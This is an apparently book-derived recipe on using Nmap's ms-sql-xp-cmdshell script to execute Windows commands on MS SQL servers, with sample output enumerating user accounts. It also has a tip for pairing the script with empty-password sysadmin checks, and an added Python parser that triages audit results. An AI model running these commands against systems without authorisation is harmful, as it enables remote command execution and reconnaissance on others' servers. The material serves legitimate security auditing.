Running commands through the command shell on MS SQL servers

MS SQL servers have an extended stored procedure called xp_cmdshell. This feature allows programmers to execute operating system commands through the MS SQL server. Nmap helps us execute custom shell commands when this option is enabled.

This recipe shows how to run Windows commands through MS SQL servers by using Nmap.

How to do it...

Open your terminal and enter the following Nmap command:

$ nmap --script-args 'mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433 <target>

The results will be included in the script output section:

PORT     STATE SERVICE  VERSION 
1433/tcp open  ms-sql-s Microsoft SQL Server 2011 11.00.1750.00 
| ms-sql-xp-cmdshell: 
|   [192.168.1.102:1433] 
|     Command: net user 
|       output 
|       ====== 
|       
|       User accounts for \ 
|       
|       ------------------------------------------------------------------------------- 
|       Administrator          cldrn             Guest          
|       postgres                 
|       The command completed with one or more errors. 
|       
|_      

How it works...

MS SQL servers usually run on TCP port 1433. The arguments --script-args 'mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433 make Nmap run the script ms-sql-xp-cmdshell against port 1433 and set the authentication credentials to be used if an MS SQL server is running there.

The script ms-sql-xp-cmdshell was written by Patrik Karlsson. It attempts to run an OS command through the stored procedure xp_cmdshell found on MS SQL servers. This script depends on the mssql library, whose documentation can be found at http://nmap.org/nsedoc/lib/mssql.html.

There's more...

By default, ms-sql-xp-cmdshell will attempt to run the command ipconfig /all, but you can specify a different one by using the script argument ms-sql-xp-cmdshell.cmd:

$ nmap --script-args 'ms-sql-xp-cmdshell.cmd="<command>",mssql.username="<user>",mssql.password=""' --script ms-sql-xp-cmdshell -p1433 <target>

If the server does not have the xp_cmdshell procedure enabled, you should see the following message:

| ms-sql-xp-cmdshell: 
|   (Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.) 
|   [192.168.1.102MSSQLSERVER] 
|_    Procedure xp_cmdshell disabled. For more information see "Surface Area Configuration" in Books Online. 

If you did not provide any valid credentials for authentication, the following message will be displayed:

| ms-sql-xp-cmdshell: 
|   [192.168.1.102:1433] 
|_    ERROR: No login credentials. 

Remember that you can use this script in combination with ms-sql-empty-password to automatically retrieve the network configuration of an MS SQL server with a sysadmin account with an empty password:

$ nmap --script ms-sql-xp-cmdshell,ms-sql-empty-password -p1433 <target>
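When auditing many MS SQL servers, the three script output shapes shown above (command executed, procedure disabled, no credentials) can be triaged automatically. The following Python script is an added example, not part of this recipe or of Nmap; it parses Nmap normal output and reports, per host, whether xp_cmdshell was found enabled, disabled, or could not be tested. The sample output and hosts are constructed for the example.

```python
import re

# Constructed sample of nmap normal output containing the three result
# shapes ms-sql-xp-cmdshell produces; hosts and values are made up.
SAMPLE_OUTPUT = """\
Nmap scan report for 192.168.1.102
| ms-sql-xp-cmdshell:
|   [192.168.1.102:1433]
|     Command: net user
|       User accounts for \\
|_      The command completed with one or more errors.
Nmap scan report for 192.168.1.103
| ms-sql-xp-cmdshell:
|   (Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.)
|   [192.168.1.103MSSQLSERVER]
|_    Procedure xp_cmdshell disabled. For more information see "Surface Area Configuration" in Books Online.
Nmap scan report for 192.168.1.104
| ms-sql-xp-cmdshell:
|   [192.168.1.104:1433]
|_    ERROR: No login credentials.
"""

SCRIPT_HEADER = re.compile(r"^\| ms-sql-xp-cmdshell:")
HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")

def classify_block(lines):
    """Map one ms-sql-xp-cmdshell output block to an audit finding."""
    text = "\n".join(lines)
    if "Procedure xp_cmdshell disabled" in text:
        return "disabled"
    if "ERROR: No login credentials" in text:
        return "no-credentials"
    if re.search(r"^\|\s+Command: ", text, re.M):
        return "enabled"  # a command actually ran: highest-priority finding
    return "unknown"

def parse_xp_cmdshell_results(output):
    """Return {host: status} for every script block in nmap normal output."""
    results, host, block = {}, None, None
    for line in output.splitlines():
        if m := HOST_LINE.match(line):
            host = m.group(1)
        if SCRIPT_HEADER.match(line):
            block = []
        if block is not None and line.startswith("|"):
            block.append(line)
            if line.startswith("|_"):  # "|_" closes the script's output
                results[host] = classify_block(block)
                block = None
    return results
```

Hosts reported as "enabled" are the ones where xp_cmdshell should be disabled (see "Surface Area Configuration" in Books Online) or the credentials rotated.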

See also

  • The Retrieving MS SQL server information recipe
  • The Brute forcing MS SQL passwords recipe
  • The Dumping the password hashes of an MS SQL server recipe
  • The Finding sysadmin accounts with empty passwords on MS SQL servers recipe